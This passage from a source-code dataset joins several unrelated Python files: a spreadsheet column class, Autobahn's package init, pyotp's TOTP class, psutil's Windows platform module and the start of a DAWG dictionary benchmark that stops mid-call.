# requests package Response object
self.request_response = None
self.__initialized = True
def __getattr__(self, key):
if key == 'format':
return self.format_
elif key == 'id':
return self.id_
elif key == 'type':
return self.type_
else:
raise AttributeError(key)
def __setattr__(self, key, value):
if key == 'format':
self.format_ = value
elif key == 'id':
self.id_ = value
elif key == 'type':
self.type_ = value
else:
super(Column, self).__setattr__(key, value)
@property
def auto_number_format(self):
return self._auto_number_format.value
@auto_number_format.setter
def auto_number_format(self, value):
self._auto_number_format.value = value
@property
def contact_options(self):
return self._contact_options
@contact_options.setter
def contact_options(self, value):
self._contact_options.load(value)
@property
def description(self):
return self._description.value
@description.setter
def description(self, value):
self._description.value = value
@property
def format_(self):
return self._format_.value
@format_.setter
def format_(self, value):
self._format_.value = value
@property
def formula(self):
return self._formula.value
@formula.setter
def formula(self, value):
self._formula.value = value
@property
def hidden(self):
return self._hidden.value
@hidden.setter
def hidden(self, value):
self._hidden.value = value
@property
def id_(self):
return self._id_.value
@id_.setter
def id_(self, value):
self._id_.value = value
@property
def index(self):
return self._index.value
@index.setter
def index(self, value):
self._index.value = value
@property
def locked(self):
return self._locked.value
@locked.setter
def locked(self, value):
self._locked.value = value
@property
def locked_for_user(self):
return self._locked_for_user.value
@locked_for_user.setter
def locked_for_user(self, value):
self._locked_for_user.value = value
@property
def options(self):
return self._options
@options.setter
def options(self, value):
self._options.load(value)
@property
def primary(self):
return self._primary.value
@primary.setter
def primary(self, value):
self._primary.value = value
@property
def symbol(self):
return self._symbol
@symbol.setter
def symbol(self, value):
self._symbol.set(value)
@property
def system_column_type(self):
return self._system_column_type
@system_column_type.setter
def system_column_type(self, value):
self._system_column_type.set(value)
@property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.load(value)
@property
def title(self):
return self._title.value
@title.setter
def title(self, value):
self._title.value = value
@property
def type_(self):
return self._type_
@type_.setter
def type_(self, value):
self._type_.set(value)
@property
def width(self):
return self._width.value
@width.setter
def width(self, value):
self._width.value = value
@property
def validation(self):
return self._validation.value
@validation.setter
def validation(self, value):
self._validation.value = value
@property
def version(self):
return self._version.value
@version.setter
def version(self, value):
self._version.value = value;
def to_dict(self):
return serialize(self)
def to_json(self):
return json.dumps(self.to_dict())
def __str__(self):
return self.to_json()
| apache-2.0 |
gijs/AutobahnPython | autobahn/autobahn/__init__.py | 4 | 1121 | ###############################################################################
##
## Copyright 2011,2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
try:
import pkg_resources
version = pkg_resources.require("Autobahn")[0].version
except:
## i.e. no setuptools or no package installed ..
version = "?.?.?"
import util
import useragent
import httpstatus
import utf8validator
import xormasker
import websocket
import resource
import prefixmap
import wamp
| apache-2.0 |
vvoody/pyotp | src/pyotp/totp.py | 5 | 1988 | from pyotp.otp import OTP
import datetime
import time
import urllib
class TOTP(OTP):
    """Time-based one-time password: derives codes from fixed-width time
    buckets (``interval`` seconds wide) fed into the base OTP generator."""
    def __init__(self, *args, **kwargs):
        """
        @option options [Integer] interval (30) the time interval in seconds for OTP
            This defaults to 30 which is standard.
        """
        # Pop 'interval' before delegating so the base OTP class never
        # receives an unexpected keyword argument.
        self.interval = kwargs.pop('interval', 30)
        super(TOTP, self).__init__(*args, **kwargs)
    def at(self, for_time):
        """
        Accepts either a Unix timestamp integer or a Time object.
        Time objects will be adjusted to UTC automatically
        @param [Time/Integer] time the time to generate an OTP for
        """
        # NOTE(review): fromtimestamp() converts to *local* time, not UTC,
        # despite what the docstring above claims -- confirm intended behavior.
        if not isinstance(for_time, datetime.datetime):
            for_time = datetime.datetime.fromtimestamp(int(for_time))
        return self.generate_otp(self.timecode(for_time))
    def now(self):
        """
        Generate the current time OTP
        @return [Integer] the OTP as an integer
        """
        return self.generate_otp(self.timecode(datetime.datetime.now()))
    def verify(self, otp, for_time=None):
        """
        Verifies the OTP passed in against the current time OTP
        @param [String/Integer] otp the OTP to check against
        """
        if for_time is None:
            for_time = datetime.datetime.now()
        # NOTE(review): plain '==' is not a constant-time comparison; a
        # timing-safe compare would be preferable for security-sensitive use.
        return otp == self.at(for_time)
    def provisioning_uri(self, name):
        """
        Returns the provisioning URI for the OTP
        This can then be encoded in a QR Code and used
        to provision the Google Authenticator app
        @param [String] name of the account
        @return [String] provisioning uri
        """
        # '@' stays unescaped so account names like user@example.com remain
        # readable in the otpauth URI.
        return 'otpauth://totp/%(name)s?secret=%(secret)s' % {
            'name': urllib.quote(name, safe='@'),
            'secret': self.secret,
        }
    def timecode(self, for_time):
        # mktime() interprets the struct_time in local time; the resulting
        # epoch seconds are bucketed into 'interval'-second steps.
        i = time.mktime(for_time.timetuple())
        return int(i / self.interval)
| mit |
zmallen/pupy | pupy/packages/windows/x86/psutil/_pswindows.py | 66 | 19166 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Windows platform implementation."""
import errno
import functools
import os
import sys
from collections import namedtuple
from . import _common
from . import _psutil_windows as cext
from ._common import conn_tmap, usage_percent, isfile_strict
from ._common import sockfam_to_enum, socktype_to_enum
from ._compat import PY3, xrange, lru_cache, long
from ._psutil_windows import (ABOVE_NORMAL_PRIORITY_CLASS,
BELOW_NORMAL_PRIORITY_CLASS,
HIGH_PRIORITY_CLASS,
IDLE_PRIORITY_CLASS,
NORMAL_PRIORITY_CLASS,
REALTIME_PRIORITY_CLASS)
if sys.version_info >= (3, 4):
import enum
else:
enum = None
# process priority constants, import from __init__.py:
# http://msdn.microsoft.com/en-us/library/ms686219(v=vs.85).aspx
__extra__all__ = ["ABOVE_NORMAL_PRIORITY_CLASS", "BELOW_NORMAL_PRIORITY_CLASS",
"HIGH_PRIORITY_CLASS", "IDLE_PRIORITY_CLASS",
"NORMAL_PRIORITY_CLASS", "REALTIME_PRIORITY_CLASS",
"CONN_DELETE_TCB",
"AF_LINK",
]
# --- module level constants (gets pushed up to psutil module)
CONN_DELETE_TCB = "DELETE_TCB"
WAIT_TIMEOUT = 0x00000102 # 258 in decimal
ACCESS_DENIED_SET = frozenset([errno.EPERM, errno.EACCES,
cext.ERROR_ACCESS_DENIED])
if enum is None:
AF_LINK = -1
else:
AddressFamily = enum.IntEnum('AddressFamily', {'AF_LINK': -1})
AF_LINK = AddressFamily.AF_LINK
TCP_STATUSES = {
cext.MIB_TCP_STATE_ESTAB: _common.CONN_ESTABLISHED,
cext.MIB_TCP_STATE_SYN_SENT: _common.CONN_SYN_SENT,
cext.MIB_TCP_STATE_SYN_RCVD: _common.CONN_SYN_RECV,
cext.MIB_TCP_STATE_FIN_WAIT1: _common.CONN_FIN_WAIT1,
cext.MIB_TCP_STATE_FIN_WAIT2: _common.CONN_FIN_WAIT2,
cext.MIB_TCP_STATE_TIME_WAIT: _common.CONN_TIME_WAIT,
cext.MIB_TCP_STATE_CLOSED: _common.CONN_CLOSE,
cext.MIB_TCP_STATE_CLOSE_WAIT: _common.CONN_CLOSE_WAIT,
cext.MIB_TCP_STATE_LAST_ACK: _common.CONN_LAST_ACK,
cext.MIB_TCP_STATE_LISTEN: _common.CONN_LISTEN,
cext.MIB_TCP_STATE_CLOSING: _common.CONN_CLOSING,
cext.MIB_TCP_STATE_DELETE_TCB: CONN_DELETE_TCB,
cext.PSUTIL_CONN_NONE: _common.CONN_NONE,
}
if enum is not None:
class Priority(enum.IntEnum):
ABOVE_NORMAL_PRIORITY_CLASS = ABOVE_NORMAL_PRIORITY_CLASS
BELOW_NORMAL_PRIORITY_CLASS = BELOW_NORMAL_PRIORITY_CLASS
HIGH_PRIORITY_CLASS = HIGH_PRIORITY_CLASS
IDLE_PRIORITY_CLASS = IDLE_PRIORITY_CLASS
NORMAL_PRIORITY_CLASS = NORMAL_PRIORITY_CLASS
REALTIME_PRIORITY_CLASS = REALTIME_PRIORITY_CLASS
globals().update(Priority.__members__)
scputimes = namedtuple('scputimes', ['user', 'system', 'idle'])
svmem = namedtuple('svmem', ['total', 'available', 'percent', 'used', 'free'])
pextmem = namedtuple(
'pextmem', ['num_page_faults', 'peak_wset', 'wset', 'peak_paged_pool',
'paged_pool', 'peak_nonpaged_pool', 'nonpaged_pool',
'pagefile', 'peak_pagefile', 'private'])
pmmap_grouped = namedtuple('pmmap_grouped', ['path', 'rss'])
pmmap_ext = namedtuple(
'pmmap_ext', 'addr perms ' + ' '.join(pmmap_grouped._fields))
ntpinfo = namedtuple(
'ntpinfo', ['num_handles', 'ctx_switches', 'user_time', 'kernel_time',
'create_time', 'num_threads', 'io_rcount', 'io_wcount',
'io_rbytes', 'io_wbytes'])
# set later from __init__.py
NoSuchProcess = None
AccessDenied = None
TimeoutExpired = None
@lru_cache(maxsize=512)
def _win32_QueryDosDevice(s):
return cext.win32_QueryDosDevice(s)
def _convert_raw_path(s):
    # convert paths using native DOS format like:
    # "\Device\HarddiskVolume1\Windows\systemew\file.txt"
    # into: "C:\Windows\systemew\file.txt"
    if PY3 and not isinstance(s, str):
        # The C extension may hand back bytes on Python 3; decode before
        # splitting on backslashes.
        s = s.decode('utf8')
    # The first three components ("\Device\HarddiskVolumeN") identify the
    # raw drive; map it to a drive letter via the cached QueryDosDevice call.
    rawdrive = '\\'.join(s.split('\\')[:3])
    driveletter = _win32_QueryDosDevice(rawdrive)
    return os.path.join(driveletter, s[len(rawdrive):])
def py2_strencode(s, encoding=sys.getfilesystemencoding()):
    """On Python 2, encode a unicode string to bytes using the filesystem
    encoding; str input (and any input on Python 3) is returned unchanged.

    Note: the default ``encoding`` is captured once, at import time.
    """
    if PY3 or isinstance(s, str):
        return s
    else:
        try:
            return s.encode(encoding)
        except UnicodeEncodeError:
            # Filesystem codec failed, return the plain unicode
            # string (this should never happen).
            return s
# --- public functions
def virtual_memory():
"""System virtual memory as a namedtuple."""
mem = cext.virtual_mem()
totphys, availphys, totpagef, availpagef, totvirt, freevirt = mem
#
total = totphys
avail = availphys
free = availphys
used = total - avail
percent = usage_percent((total - avail), total, _round=1)
return svmem(total, avail, percent, used, free)
def swap_memory():
"""Swap system memory as a (total, used, free, sin, sout) tuple."""
mem = cext.virtual_mem()
total = mem[2]
free = mem[3]
used = total - free
percent = usage_percent(used, total, _round=1)
return _common.sswap(total, used, free, percent, 0, 0)
def disk_usage(path):
"""Return disk usage associated with path."""
try:
total, free = cext.disk_usage(path)
except WindowsError:
if not os.path.exists(path):
msg = "No such file or directory: '%s'" % path
raise OSError(errno.ENOENT, msg)
raise
used = total - free
percent = usage_percent(used, total, _round=1)
return _common.sdiskusage(total, used, free, percent)
def disk_partitions(all):
"""Return disk partitions."""
rawlist = cext.disk_partitions(all)
return [_common.sdiskpart(*x) for x in rawlist]
def cpu_times():
"""Return system CPU times as a named tuple."""
user, system, idle = cext.cpu_times()
return scputimes(user, system, idle)
def per_cpu_times():
    """Return system per-CPU times as a list of named tuples."""
    # One scputimes(user, system, idle) entry per logical CPU.
    return [scputimes(user, system, idle)
            for (user, system, idle) in cext.per_cpu_times()]
def cpu_count_logical():
"""Return the number of logical CPUs in the system."""
return cext.cpu_count_logical()
def cpu_count_physical():
    """Return the number of physical CPUs in the system."""
    # Delegates entirely to the C extension.
    return cext.cpu_count_phys()
def boot_time():
    """The system boot time expressed in seconds since the epoch."""
    # Delegates entirely to the C extension.
    return cext.boot_time()
def net_connections(kind, _pid=-1):
    """Return socket connections. If pid == -1 return system-wide
    connections (as opposed to connections opened by one process only).
    """
    if kind not in conn_tmap:
        raise ValueError("invalid %r kind argument; choose between %s"
                         % (kind, ', '.join([repr(x) for x in conn_tmap])))
    families, types = conn_tmap[kind]
    rawlist = cext.net_connections(_pid, families, types)
    ret = set()
    for item in rawlist:
        fd, fam, type, laddr, raddr, status, pid = item
        # Translate the raw C-level constants into psutil-level values.
        status = TCP_STATUSES[status]
        fam = sockfam_to_enum(fam)
        type = socktype_to_enum(type)
        if _pid == -1:
            # system-wide variant includes the owning pid in the tuple
            nt = _common.sconn(fd, fam, type, laddr, raddr, status, pid)
        else:
            nt = _common.pconn(fd, fam, type, laddr, raddr, status)
        ret.add(nt)
    # A set is used so duplicate entries from the C layer are collapsed.
    return list(ret)
def net_if_stats():
    """Return NIC stats keyed by interface name."""
    ret = cext.net_if_stats()
    for name, items in ret.items():
        # NOTE(review): on Python 2 py2_strencode() may return a different
        # (byte-string) key, which would add a new key to the dict being
        # iterated; .items() returns a list there, so iteration is safe,
        # but the original unicode key is then left in the result — verify.
        name = py2_strencode(name)
        isup, duplex, speed, mtu = items
        # Upgrade the raw duplex int to an enum when this psutil version
        # provides one.
        if hasattr(_common, 'NicDuplex'):
            duplex = _common.NicDuplex(duplex)
        ret[name] = _common.snicstats(isup, duplex, speed, mtu)
    return ret
def net_io_counters():
    """Return per-NIC I/O counters keyed by (re-encoded) interface name."""
    raw = cext.net_io_counters()
    return {py2_strencode(name): counters for name, counters in raw.items()}
def net_if_addrs():
    """Return per-address NIC info with the NIC name re-encoded on py2."""
    return [[py2_strencode(entry[0])] + list(entry[1:])
            for entry in cext.net_if_addrs()]
def users():
    """Return currently connected users as a list of namedtuples."""
    retlist = []
    rawlist = cext.users()
    for item in rawlist:
        user, hostname, tstamp = item
        user = py2_strencode(user)
        # The terminal field is not provided by the C layer; always None.
        nt = _common.suser(user, None, hostname, tstamp)
        retlist.append(nt)
    return retlist
# Thin aliases: these functions are implemented entirely in the C extension.
pids = cext.pids
pid_exists = cext.pid_exists
disk_io_counters = cext.disk_io_counters
ppid_map = cext.ppid_map  # not meant to be public
def wrap_exceptions(fun):
    """Decorator which translates bare OSError and WindowsError
    exceptions into NoSuchProcess and AccessDenied.
    """
    @functools.wraps(fun)
    def wrapper(self, *args, **kwargs):
        try:
            return fun(self, *args, **kwargs)
        except OSError as err:
            # support for private module import
            # (the exception classes are injected by the psutil package;
            # if they are still None we cannot translate, so re-raise)
            if NoSuchProcess is None or AccessDenied is None:
                raise
            if err.errno in ACCESS_DENIED_SET:
                raise AccessDenied(self.pid, self._name)
            if err.errno == errno.ESRCH:
                raise NoSuchProcess(self.pid, self._name)
            raise
    return wrapper
class Process(object):
    """Wrapper class around underlying C implementation."""
    __slots__ = ["pid", "_name", "_ppid"]
    def __init__(self, pid):
        # _name/_ppid act as caches filled in lazily by the psutil layer.
        self.pid = pid
        self._name = None
        self._ppid = None
    @wrap_exceptions
    def name(self):
        """Return process name, which on Windows is always the final
        part of the executable.
        """
        # This is how PIDs 0 and 4 are always represented in taskmgr
        # and process-hacker.
        if self.pid == 0:
            return "System Idle Process"
        elif self.pid == 4:
            return "System"
        else:
            try:
                # Note: this will fail with AD for most PIDs owned
                # by another user but it's faster.
                return py2_strencode(os.path.basename(self.exe()))
            except AccessDenied:
                return py2_strencode(cext.proc_name(self.pid))
    @wrap_exceptions
    def exe(self):
        # Full path of the process executable, converted from the raw
        # "\Device\..." form to a drive-letter path.
        # Note: os.path.exists(path) may return False even if the file
        # is there, see:
        # http://stackoverflow.com/questions/3112546/os-path-exists-lies
        # see https://github.com/giampaolo/psutil/issues/414
        # see https://github.com/giampaolo/psutil/issues/528
        if self.pid in (0, 4):
            raise AccessDenied(self.pid, self._name)
        return py2_strencode(_convert_raw_path(cext.proc_exe(self.pid)))
    @wrap_exceptions
    def cmdline(self):
        # Command line as a list of arguments; re-encoded on Python 2.
        ret = cext.proc_cmdline(self.pid)
        if PY3:
            return ret
        else:
            return [py2_strencode(s) for s in ret]
    def ppid(self):
        # Parent PID via the system-wide pid -> ppid map.
        try:
            return ppid_map()[self.pid]
        except KeyError:
            raise NoSuchProcess(self.pid, self._name)
    def _get_raw_meminfo(self):
        # Raw memory-counters tuple; falls back to a second C routine when
        # direct access is denied.
        try:
            return cext.proc_memory_info(self.pid)
        except OSError as err:
            if err.errno in ACCESS_DENIED_SET:
                # TODO: the C ext can probably be refactored in order
                # to get this from cext.proc_info()
                return cext.proc_memory_info_2(self.pid)
            raise
    @wrap_exceptions
    def memory_info(self):
        # on Windows RSS == WorkingSetSize and VSM == PagefileUsage
        # fields of PROCESS_MEMORY_COUNTERS struct:
        # http://msdn.microsoft.com/en-us/library/windows/desktop/
        # ms684877(v=vs.85).aspx
        t = self._get_raw_meminfo()
        return _common.pmem(t[2], t[7])
    @wrap_exceptions
    def memory_info_ex(self):
        # Extended variant: expose every raw counter field.
        return pextmem(*self._get_raw_meminfo())
    def memory_maps(self):
        # Generator of (addr, perm, path, rss) tuples for mapped regions.
        try:
            raw = cext.proc_memory_maps(self.pid)
        except OSError as err:
            # XXX - can't use wrap_exceptions decorator as we're
            # returning a generator; probably needs refactoring.
            if err.errno in ACCESS_DENIED_SET:
                raise AccessDenied(self.pid, self._name)
            if err.errno == errno.ESRCH:
                raise NoSuchProcess(self.pid, self._name)
            raise
        else:
            for addr, perm, path, rss in raw:
                path = _convert_raw_path(path)
                addr = hex(addr)
                yield (addr, perm, path, rss)
    @wrap_exceptions
    def kill(self):
        # Forcibly terminate the process.
        return cext.proc_kill(self.pid)
    @wrap_exceptions
    def send_signal(self, sig):
        # Delegate to os.kill (limited signal support on Windows).
        os.kill(self.pid, sig)
    @wrap_exceptions
    def wait(self, timeout=None):
        # Wait for termination; *timeout* is in seconds, None waits forever.
        if timeout is None:
            timeout = cext.INFINITE
        else:
            # WaitForSingleObject() expects time in milliseconds
            timeout = int(timeout * 1000)
        ret = cext.proc_wait(self.pid, timeout)
        if ret == WAIT_TIMEOUT:
            # support for private module import
            if TimeoutExpired is None:
                raise RuntimeError("timeout expired")
            raise TimeoutExpired(timeout, self.pid, self._name)
        return ret
    @wrap_exceptions
    def username(self):
        # Kernel pseudo-processes (0 and 4) belong to the SYSTEM account.
        if self.pid in (0, 4):
            return 'NT AUTHORITY\\SYSTEM'
        return cext.proc_username(self.pid)
    @wrap_exceptions
    def create_time(self):
        # special case for kernel process PIDs; return system boot time
        if self.pid in (0, 4):
            return boot_time()
        try:
            return cext.proc_create_time(self.pid)
        except OSError as err:
            if err.errno in ACCESS_DENIED_SET:
                return ntpinfo(*cext.proc_info(self.pid)).create_time
            raise
    @wrap_exceptions
    def num_threads(self):
        # Thread count taken from the aggregated proc_info() tuple.
        return ntpinfo(*cext.proc_info(self.pid)).num_threads
    @wrap_exceptions
    def threads(self):
        # List of (id, user_time, system_time) named tuples.
        rawlist = cext.proc_threads(self.pid)
        retlist = []
        for thread_id, utime, stime in rawlist:
            ntuple = _common.pthread(thread_id, utime, stime)
            retlist.append(ntuple)
        return retlist
    @wrap_exceptions
    def cpu_times(self):
        # Fall back to the aggregated proc_info() data when direct access
        # is denied.
        try:
            ret = cext.proc_cpu_times(self.pid)
        except OSError as err:
            if err.errno in ACCESS_DENIED_SET:
                nt = ntpinfo(*cext.proc_info(self.pid))
                ret = (nt.user_time, nt.kernel_time)
            else:
                raise
        return _common.pcputimes(*ret)
    @wrap_exceptions
    def suspend(self):
        return cext.proc_suspend(self.pid)
    @wrap_exceptions
    def resume(self):
        return cext.proc_resume(self.pid)
    @wrap_exceptions
    def cwd(self):
        if self.pid in (0, 4):
            raise AccessDenied(self.pid, self._name)
        # return a normalized pathname since the native C function appends
        # "\\" at the and of the path
        path = cext.proc_cwd(self.pid)
        return py2_strencode(os.path.normpath(path))
    @wrap_exceptions
    def open_files(self):
        if self.pid in (0, 4):
            return []
        ret = set()
        # Filenames come in in native format like:
        # "\Device\HarddiskVolume1\Windows\systemew\file.txt"
        # Convert the first part in the corresponding drive letter
        # (e.g. "C:\") by using Windows's QueryDosDevice()
        raw_file_names = cext.proc_open_files(self.pid)
        for _file in raw_file_names:
            _file = _convert_raw_path(_file)
            if isfile_strict(_file):
                if not PY3:
                    _file = py2_strencode(_file)
                ntuple = _common.popenfile(_file, -1)
                ret.add(ntuple)
        return list(ret)
    @wrap_exceptions
    def connections(self, kind='inet'):
        # Delegate to the module-level implementation, filtered by pid.
        return net_connections(kind, _pid=self.pid)
    @wrap_exceptions
    def nice_get(self):
        # Windows priority class, upgraded to a Priority enum if available.
        value = cext.proc_priority_get(self.pid)
        if enum is not None:
            value = Priority(value)
        return value
    @wrap_exceptions
    def nice_set(self, value):
        return cext.proc_priority_set(self.pid, value)
    # available on Windows >= Vista
    if hasattr(cext, "proc_io_priority_get"):
        @wrap_exceptions
        def ionice_get(self):
            return cext.proc_io_priority_get(self.pid)
        @wrap_exceptions
        def ionice_set(self, value, _):
            # The extra positional arg exists only for cross-platform API
            # compatibility and must not be used on Windows.
            if _:
                raise TypeError("set_proc_ionice() on Windows takes only "
                                "1 argument (2 given)")
            if value not in (2, 1, 0):
                raise ValueError("value must be 2 (normal), 1 (low) or 0 "
                                 "(very low); got %r" % value)
            return cext.proc_io_priority_set(self.pid, value)
    @wrap_exceptions
    def io_counters(self):
        # Fall back to the aggregated proc_info() data on access denied.
        try:
            ret = cext.proc_io_counters(self.pid)
        except OSError as err:
            if err.errno in ACCESS_DENIED_SET:
                nt = ntpinfo(*cext.proc_info(self.pid))
                ret = (nt.io_rcount, nt.io_wcount, nt.io_rbytes, nt.io_wbytes)
            else:
                raise
        return _common.pio(*ret)
    @wrap_exceptions
    def status(self):
        # Reported as STOPPED only when the C layer says the process is
        # suspended; RUNNING otherwise.
        suspended = cext.proc_is_suspended(self.pid)
        if suspended:
            return _common.STATUS_STOPPED
        else:
            return _common.STATUS_RUNNING
    @wrap_exceptions
    def cpu_affinity_get(self):
        def from_bitmask(x):
            # Expand an affinity bitmask into a list of CPU indexes.
            return [i for i in xrange(64) if (1 << i) & x]
        bitmask = cext.proc_cpu_affinity_get(self.pid)
        return from_bitmask(bitmask)
    @wrap_exceptions
    def cpu_affinity_set(self, value):
        def to_bitmask(l):
            # Collapse a list of CPU indexes into an affinity bitmask.
            if not l:
                raise ValueError("invalid argument %r" % l)
            out = 0
            for b in l:
                out |= 2 ** b
            return out
        # SetProcessAffinityMask() states that ERROR_INVALID_PARAMETER
        # is returned for an invalid CPU but this seems not to be true,
        # therefore we check CPUs validy beforehand.
        allcpus = list(range(len(per_cpu_times())))
        for cpu in value:
            if cpu not in allcpus:
                if not isinstance(cpu, (int, long)):
                    raise TypeError(
                        "invalid CPU %r; an integer is required" % cpu)
                else:
                    raise ValueError("invalid CPU %r" % cpu)
        bitmask = to_bitmask(value)
        cext.proc_cpu_affinity_set(self.pid, bitmask)
    @wrap_exceptions
    def num_handles(self):
        try:
            return cext.proc_num_handles(self.pid)
        except OSError as err:
            if err.errno in ACCESS_DENIED_SET:
                return ntpinfo(*cext.proc_info(self.pid)).num_handles
            raise
    @wrap_exceptions
    def num_ctx_switches(self):
        ctx_switches = ntpinfo(*cext.proc_info(self.pid)).ctx_switches
        # only voluntary ctx switches are supported
        return _common.pctxsw(ctx_switches, 0)
| bsd-3-clause |
moonlet/DAWG | bench/speed.py | 4 | 8857 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, division
import random
import string
import timeit
import os
import zipfile
import struct
#import pstats
#import cProfile
import dawg
def words100k():
    """Load the 100k-word benchmark fixture bundled next to this script.

    Returns the list of unicode words stored in the single member of
    ``words100k.txt.zip``.
    """
    zip_name = os.path.join(
        os.path.abspath(os.path.dirname(__file__)),
        'words100k.txt.zip'
    )
    # Use context managers so the archive and member handles are closed
    # deterministically instead of leaking until garbage collection.
    with zipfile.ZipFile(zip_name) as zf:
        with zf.open(zf.namelist()[0]) as member:
            txt = member.read().decode('utf8')
    return txt.splitlines()
def random_words(num):
    """Generate *num* pseudo-random words of 1-15 characters drawn from a
    mixed Russian/ASCII alphabet."""
    russian = 'абвгдеёжзиклмнопрстуфхцчъыьэюя'
    alphabet = '%s%s' % (russian, string.ascii_letters)
    result = []
    for _ in range(num):
        length = random.randint(1, 15)
        result.append("".join([random.choice(alphabet) for _ in range(length)]))
    return result
def truncated_words(words):
    """Return the 3-character prefix of every word (shorter words pass
    through unchanged)."""
    prefixes = []
    for item in words:
        prefixes.append(item[:3])
    return prefixes
def prefixes1k(words, prefix_len):
    """Return up to 1000 prefixes of length *prefix_len*, sampled evenly
    from the words that are at least that long.

    Bug fix: the sampling step ``len(words) // 1000`` is 0 when fewer than
    1000 eligible words exist, which makes the slice raise
    ``ValueError: slice step cannot be zero``.  The step is clamped to 1
    so short word lists are handled too (output for >= 1000 words is
    unchanged).
    """
    words = [w for w in words if len(w) >= prefix_len]
    every_nth = max(1, int(len(words)/1000))
    _words = [w[:prefix_len] for w in words[::every_nth]]
    return _words[:1000]
def leet_words(words, replaces):
    """Apply every old->new character substitution in *replaces* to every
    word, in dict iteration order."""
    for old, new in replaces.items():
        words = [w.replace(old, new) for w in words]
    return words
# Benchmark fixtures, built once at import time: the zipped word list plus
# random and derived word sets used as hit/miss/prefix inputs.
WORDS100k = words100k()
MIXED_WORDS100k = truncated_words(WORDS100k)
NON_WORDS100k = random_words(100000)
PREFIXES_3_1k = prefixes1k(WORDS100k, 3)
PREFIXES_5_1k = prefixes1k(WORDS100k, 5)
PREFIXES_8_1k = prefixes1k(WORDS100k, 8)
PREFIXES_15_1k = prefixes1k(WORDS100k, 15)
# Leetspeak substitutions exercised by the similar_keys benchmarks.
LEET_REPLACES = {
    'o': '0',
    'O': '0',
    'u': '0',
    'l': '1',
    'i': '1',
    'e': '3',
    'E': '3',
    'A': '4',
    'a': '4',
    'h': '4',
    's': 'z',
}
LEET_50k = leet_words(WORDS100k[:50000], LEET_REPLACES)
def format_result(key, value, text_width):
    """Print one 'name value' benchmark line with the name left-padded to
    *text_width* characters."""
    print(" %s %s" % (key.ljust(text_width), value))
def bench(name, timer, descr='M ops/sec', op_count=0.1, repeats=3, runs=5,
          text_width=33):
    """Run *timer* several times and print the best observed throughput.

    name: label printed next to the result.
    timer: a timeit.Timer-like object.
    descr: unit suffix appended to the number.
    op_count: millions (or thousands) of operations per single repeat,
        used to convert elapsed time into a rate.
    repeats/runs: timeit batching; the fastest run wins.
    """
    try:
        times = []
        for x in range(runs):
            times.append(timer.timeit(repeats))
        def op_time(time):
            return op_count*repeats / time
        val = "%0.3f%s" % (op_time(min(times)), descr)
        format_result(name, val, text_width)
    # Some data structures don't implement the method under test; the
    # unused exception binding was removed.
    except (AttributeError, TypeError):
        format_result(name, "not supported", text_width)
def create_dawg():
    # Plain DAWG built from the 100k-word fixture.
    words = words100k()
    return dawg.DAWG(words)
def create_bytes_dawg():
    # BytesDAWG mapping each word to its length packed as little-endian u16.
    words = words100k()
    values = [struct.pack(str('<H'), len(word)) for word in words]
    return dawg.BytesDAWG(zip(words, values))
def create_record_dawg():
    # RecordDAWG with a single u16 field holding the word length.
    words = words100k()
    values = [ [len(word)] for word in words]
    return dawg.RecordDAWG(str('<H'), zip(words, values))
def create_int_dawg():
    # IntDAWG mapping each word to its length.
    words = words100k()
    values = [len(word) for word in words]
    return dawg.IntDAWG(zip(words, values))
def create_leet_dawg():
    # DAWG over the leetspeak-transformed 50k-word subset.
    return dawg.DAWG(LEET_50k)
def benchmark():
    """Run the full benchmark suite: dict vs the DAWG variants, plus
    DAWG-specific prefix/similar_keys operations."""
    print('\n====== Benchmarks (100k unique unicode words) =======\n')
    # (label, statement run by timeit, unit, op_count, repeats)
    tests = [
        ('__getitem__ (hits)', "for word in WORDS100k: data[word]", 'M ops/sec', 0.1, 3),
        ('get() (hits)', "for word in WORDS100k: data.get(word)", 'M ops/sec', 0.1, 3),
        ('get() (misses)', "for word in NON_WORDS_10k: data.get(word)", 'M ops/sec', 0.01, 5),
        ('__contains__ (hits)', "for word in WORDS100k: word in data", 'M ops/sec', 0.1, 3),
        ('__contains__ (misses)', "for word in NON_WORDS100k: word in data", 'M ops/sec', 0.1, 3),
        ('items()', 'list(data.items())', ' ops/sec', 1, 1),
        ('keys()', 'list(data.keys())', ' ops/sec', 1, 1),
        # ('values()', 'list(data.values())', ' ops/sec', 1, 1),
    ]
    # The setup strings are executed by timeit in a fresh namespace, hence
    # the imports from __main__; they must stay unindented.
    common_setup = """
from __main__ import create_dawg, create_bytes_dawg, create_record_dawg, create_int_dawg, create_leet_dawg
from __main__ import WORDS100k, NON_WORDS100k, MIXED_WORDS100k
from __main__ import PREFIXES_3_1k, PREFIXES_5_1k, PREFIXES_8_1k, PREFIXES_15_1k
from __main__ import LEET_50k, LEET_REPLACES
NON_WORDS_10k = NON_WORDS100k[:10000]
NON_WORDS_1k = ['ыва', 'xyz', 'соы', 'Axx', 'avы']*200
"""
    dict_setup = common_setup + 'data = dict((word, len(word)) for word in WORDS100k);'
    dawg_setup = common_setup + 'data = create_dawg(); repl = data.compile_replaces(LEET_REPLACES);'
    bytes_dawg_setup = common_setup + 'data = create_bytes_dawg();'
    record_dawg_setup = common_setup + 'data = create_record_dawg();'
    int_dawg_setup = common_setup + 'data = create_int_dawg();'
    leet_dawg_setup = common_setup + 'data = create_leet_dawg(); repl = data.compile_replaces(LEET_REPLACES);'
    structures = [
        ('dict', dict_setup),
        ('DAWG', dawg_setup),
        ('BytesDAWG', bytes_dawg_setup),
        ('RecordDAWG', record_dawg_setup),
        ('IntDAWG', int_dawg_setup),
    ]
    # Common mapping-style operations, run against every structure.
    for test_name, test, descr, op_count, repeats in tests:
        for name, setup in structures:
            timer = timeit.Timer(test, setup)
            full_test_name = "%s %s" % (name, test_name)
            bench(full_test_name, timer, descr, op_count, repeats, 9)
    # DAWG-specific benchmarks
    # benchmark for similar_keys
    bench(
        "DAWG.similar_keys (no replaces)",
        timeit.Timer(
